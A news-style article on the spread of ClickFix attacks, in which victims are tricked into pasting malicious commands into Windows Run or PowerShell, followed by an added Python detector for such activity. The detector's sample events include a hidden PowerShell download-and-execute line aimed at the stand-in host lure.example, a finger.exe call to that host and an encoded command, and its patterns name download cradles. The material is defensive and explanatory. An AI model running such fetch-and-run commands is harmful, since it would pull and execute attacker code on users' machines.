ClickFix attacks on the rise

Security posts report a rise in 'ClickFix' attacks, where victims are social-engineered into pasting malicious code into Windows terminals to bypass traditional defenses. The trend highlights a technique that relies on user action and copy-paste behaviors rather than software vulnerabilities alone. (x.com)

ClickFix attacks have spread from a niche scam into a daily tactic, with Microsoft saying campaigns now hit thousands of devices worldwide each day. (microsoft.com) The trick is simple: a fake error, security warning, or CAPTCHA tells a user to copy a command, open Windows Run or PowerShell, paste it, and launch the attacker’s code by hand. Microsoft says some versions also preload the command into the clipboard before the victim pastes it. (microsoft.com)

Proofpoint said on November 18, 2024 that it saw ClickFix move from early campaigns tied to TA571 and ClearFake into a much broader slice of the threat landscape. The company said the lures increasingly used fake fixes and fake verification steps to push victims into running PowerShell. (proofpoint.com)

Security agencies now treat the method as part of mainstream intrusion playbooks. In a joint Federal Bureau of Investigation and Cybersecurity and Infrastructure Security Agency advisory on Interlock ransomware, published in 2025, investigators said the group used ClickFix for initial access before moving to credential theft and lateral movement. (cisa.gov)

The shift is away from breaking software and toward steering people. ReliaQuest said ClickFix accounted for the largest share of malware incidents it tracked from December 1, 2025 through February 28, 2026, in a period when attackers leaned on trusted tools, stolen identities, and user behavior. (reliaquest.com) That pattern has widened beyond cybercrime. Proofpoint said on April 17, 2025 that state-backed groups linked to North Korea, Iran, and Russia all tested ClickFix in campaigns observed from late 2024 into early 2025, using it to replace the installation step in existing attack chains. (proofpoint.com)

The payloads vary, but the opening move stays the same. Microsoft said a March 13, 2025 phishing campaign impersonating Booking.com used ClickFix to deliver credential-stealing malware to hospitality targets across North America, Europe, Oceania, and parts of Asia. (microsoft.com)

Researchers are also tracking new variants built on the same idea. Microsoft said on February 5, 2026 that a “CrashFix” campaign used a fake browser pop-up and abused the legitimate Windows tool finger.exe to help deliver a Python-based remote access trojan. (microsoft.com)

Cybersecurity and Infrastructure Security Agency guidance now maps the behavior as “malicious copy and paste,” a user-execution technique in which a victim is talked into running the code for the attacker. That is why the defense advice centers on blocking risky script interpreters, limiting what users can run, and training people not to paste commands from pop-ups into Windows tools. (cisa.gov)

ClickFix keeps working because it turns an ordinary habit into the breach point: the victim clicks, pastes, and launches the command themselves. Microsoft’s warning was blunt in August 2025: think before you ClickFix. (microsoft.com)
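The process-tree shape described above (a script host launched by hand from the Run dialog, or the CrashFix-style finger.exe case) is what a detection engineer keys on. The following Python detector is an added example written for this page, not code from Microsoft, CISA or any vendor cited here; it reads records shaped like Sysmon Event ID 1 and flags a script host whose parent is explorer.exe and whose command line carries fetch-and-run traits. The regexes, the sample records, the `lure.example` host and the `ev` helper are all assumptions constructed for the example.

```python
import re
# Script hosts a pasted ClickFix command lands in; finger.exe is here because the CrashFix variant abused it.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "finger.exe"}
SHELLS = {"explorer.exe", "cmd.exe", "powershell.exe", "pwsh.exe"}

# Fetch-and-run command-line traits. These regexes are an assumption for this example, not a vendor rule set.
CRADLE_PATTERNS = {
    "remote_fetch": re.compile(r"\b(iwr|invoke-webrequest|curl|wget|downloadstring|iex|invoke-expression)\b|https?://", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden|-nop(rofile)?\b", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "mshta_remote": re.compile(r"mshta(\.exe)?\s+\S*https?://", re.I),
}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Reasons an event looks like a hand-pasted ClickFix command, or [] if benign or out of scope."""
    parent, image = basename(event.get("ParentImage", "")), basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if image not in SCRIPT_HOSTS:
        return []
    reasons = [name for name, rx in CRADLE_PATTERNS.items() if rx.search(cmd)]
    if image == "finger.exe" and parent in SHELLS:
        reasons.append("finger_lolbin_from_shell")
    # The Run dialog (Win+R) and the Explorer address bar launch the pasted command under
    # explorer.exe; script hosts with other parents (Office, scheduled tasks) are another detection.
    if parent != "explorer.exe" and "finger_lolbin_from_shell" not in reasons:
        return []
    return reasons

def scan(events):
    """Return (index, reasons) for every flagged event."""
    return [(i, r) for i, r in enumerate(map(classify, events)) if r]

def ev(parent, image, cmd):  # record using Sysmon Event ID 1 field names
    return {"ParentImage": parent, "Image": image, "CommandLine": cmd}

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed sample records, not real telemetry
    ev(r"C:\Windows\explorer.exe", PS, 'powershell -w hidden -c "iwr http://lure.example/check | iex"'),  # pasted into Win+R
    ev(r"C:\Windows\explorer.exe", PS, f'"{PS}"'),  # user simply opened PowerShell from the Start menu
    ev(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\finger.exe", "finger.exe user@lure.example"),  # CrashFix-style
    ev(r"C:\Windows\System32\svchost.exe", PS, "powershell.exe -nop -w hidden -enc QQBkAG0AaQBuAFMAYwByAGkAcAB0AA=="),  # scheduled task
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)}")
```

The fourth sample is deliberately skipped: a hidden, encoded PowerShell run by the Task Scheduler is common for admin scripts, and the page's point is the interactive parent, not the flags alone.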
